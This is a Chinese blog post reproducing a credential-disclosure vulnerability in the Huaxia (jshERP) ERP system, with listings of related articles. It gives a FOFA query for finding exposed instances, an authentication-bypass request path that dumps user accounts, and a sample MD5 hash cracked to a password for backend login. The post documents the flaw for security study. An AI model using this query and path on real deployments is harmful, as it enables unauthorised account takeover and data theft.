[漏洞复现]华夏erp账号密码泄露

最新推荐文章于 2024-01-20 12:32:32 发布
最新推荐文章于 2024-01-20 12:32:32 发布
阅读量1.1k 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17754023/article/details/131340697
版权

描述

华夏 ERP 是一个基于SpringBoot框架和 SaaS模式的系统。
华夏 ERP 存在帐号密码泄露漏洞,攻击者可利用该漏洞获取系统所有账号密码从而登录系统进行恶意攻击。
目前官方暂未发布安全版本修复此漏洞,建议联系厂商获取加固建议。

fofa语法:"jshERP-boot"

POC

/jshERP-boot/user/getAllList;.ico

{
                "id": 120,
                "username": "管理员",
                "loginName": "admin",
                "password": "e10adc3949ba59abbe56e057f20f883e",
                "position": null,
                "department": null,
                "email": null,
                "phonenum": null,
                "ismanager": 1,
                "isystem": 0,
                "status": 0,
                "description": null,
                "remark": null,
                "tenantId": 0
            },

获取到admin账号md5加密后的值

(admin只是平台运维用户,真正的管理员是租户(测试账号为jsh),admin不能编辑任何业务数据,只能配置平台菜单和创建租户)

解密后获得密码:123456

 成功登录后台

 

 

 

一个梦字
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
华夏ERP getAllList信息泄露漏洞复现(CVE-2024-0490)
0xSec
01-16 1460
华夏ERP 系统中存在一个问题,被评定为有问题的。该问题影响了文件/user/getAllList的某些未知处理过程。未经身份验证的攻击者可以利用此问题获取后台用户名密码列表。可导致后台被控,漏洞已被公开披露,可能被利用。
华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)
失心少年
06-19 746
华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。
华夏ERP_v2.3.1最新版SQL与RCE的审计过程1
08-03
前言认证绕过华夏ERP_v2.3.1最新版SQL与RCE的审计过程1.6. public class LogCostFilter implements Filt
华夏ERP存在泄露用户名和密码敏感漏洞复现
m0_49025459的博客
07-18 554
密码是MD5加密的,我们只需要正常的去解密,然后输入账号密码即可。
华夏ERP getAllList;.ico敏感信息泄露漏洞
Keepb1ue的博客
12-22 753
华夏ERP是基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。将password的值进行md5解密为明文,即可登录。对相关接口进行限制访问、鉴权。
华夏账号密码信息泄露漏洞-漏洞复现
最新发布
weixin_43167326的博客
01-20 484
jshERP立志为中小企业提供开源好用的。
华夏ERP-用户手册
11-13
华夏erp-用户手册 用户手册可以下下作为开发辅助,高分得来。 华夏erp-用户手册 用户手册可以下下作为开发辅助
华夏erp项目工程源码
11-15
华夏erp项目工程源码
华夏ERP系统用户手册-最新版v3.2
02-16
第一页是空的,大家从第二页开始看
华夏ERP-用户手册.pdf
04-07
最近有很多朋友想要知道华夏ERP具体怎么使用的,本人花了一些时间整理了下,内容比较多,有100多页,大致包含了零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理这些模块。
jshERP开源进销存软件
07-07
jshERP完整开源版J2EE代码 很多人说jshERP是目前唯一完整开源的进销存系统 虽然目前只有进销存+财务的功能,但后面将会推出ERP的全部功能,大家一起努力吧 系统部署初始账号:jsh,密码:123456,部署如有问题请联系 源码托管地址:https://git.oschina.net/jishenghua/JSH_ERP 开发初衷 jshERP立志为中小企业提供免费好用的ERP软件,降低企业的信息化成本 个人开发者也可以使用jshERP进行二次开发,承接外包ERP项目 初学JAVA的小伙伴可以下载源代码来进行学习交流 技术框架 核心框架:Spring Framework 3.0.5 视图框架:Struts 2.2.3 持久层框架:Hibernate 3.0 日志管理:Log4j 1.2.16 JS框架:Jquery 1.8.0 UI框架: EasyUI 1.3.5 桌面框架: HoorayOS 项目管理框架: Maven3.2.3 开发环境 建议开发者使用以下环境,可以避免版本带来的问题 IDE: MyEclipse8.5+/Eclipse4.4+ DB: Mysql5.1 JDK: JDK1.6+ WEB: Tomcat6.0+ Maven: Maven3.2.3+ 为方便大家搭建开发环境,分享了下载地址 http://pan.baidu.com/s/1nuKnlNV 运行环境 WEB服务器:Tomcat6.0+ 数据库服务器:Mysql5.1 JAVA平台: JRE1.6+ 操作系统:Windows、Linux等 开源说明 本系统100%开源,遵守Apache2.0协议
华夏ERP.zip
09-06
华夏ERP.zip
SpringBoot 框架华夏 ERP 源码审计1
08-03
1. requestUrl 中如果存在 / doc.html,/register.html,/login.html 字段就可 2. 传 verify() 法进判
华夏ERP-功能清单.xlsx
04-07
整理了华夏ERP的功能清单,方便用户更加方便的了解系统的功能模块,整体掌握。大致包含了零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。
华夏ERP资源包jshERP
07-14
打包了一个版本,仅供测试用,最新的可以去码云上下载
华夏ERP信息泄露
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
08-06 528
华夏ERP是一种企业资源规划(ERP)软件,旨在为企业提供全面的信息管理和集成解决方案,以提高效率、降低成本并优化业务流程。华夏ERP通常用于中小型企业。华夏ERP前台泄露了某api接口,恶意攻击者可通过调用该接口,对用户的账号和密码进行非授权访问,在获取到账号和密码后,恶意攻击者可接管后台。定期备份和灾难恢复计划:定期备份敏感信息,并建立有效的灾难恢复计划,以便在数据泄露事件发生时能够快速恢复数据。定期更新和修补软件漏洞:及时更新和修补系统和应用程序的漏洞,以减少攻击者利用漏洞获取敏感信息的可能性。
华夏ERP账号密码泄露漏+RCE
weixin_62352348的博客
01-18 648
华夏ERP账号密码泄露漏+RCE
「Java代码审计」华夏ERP3.0代码审计
橙留香Park的博客
09-22 3477
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ..
华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)
nnn2188185的博客
06-16 1478
华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。 华夏ERP系统存在敏感信息漏洞,攻击者可利用该漏洞获取敏感信息。
华夏ERP 盘点插件
08-17
根据引用中提到的华夏ERP的模块,目前华夏ERP并没有明确提到盘点插件。华夏ERP主要关注进销存和财务功能,包括零售管理、采购管理、销售管理、仓库管理、财务管理等模块。如果您需要使用盘点插件,可以考虑与华夏ERP开发团队联系,了解他们是否有相关的盘点插件或者是否可以定制开发。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [5款优秀的开源的ERP系统](https://blog.csdn.net/huaairen/article/details/88596341)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值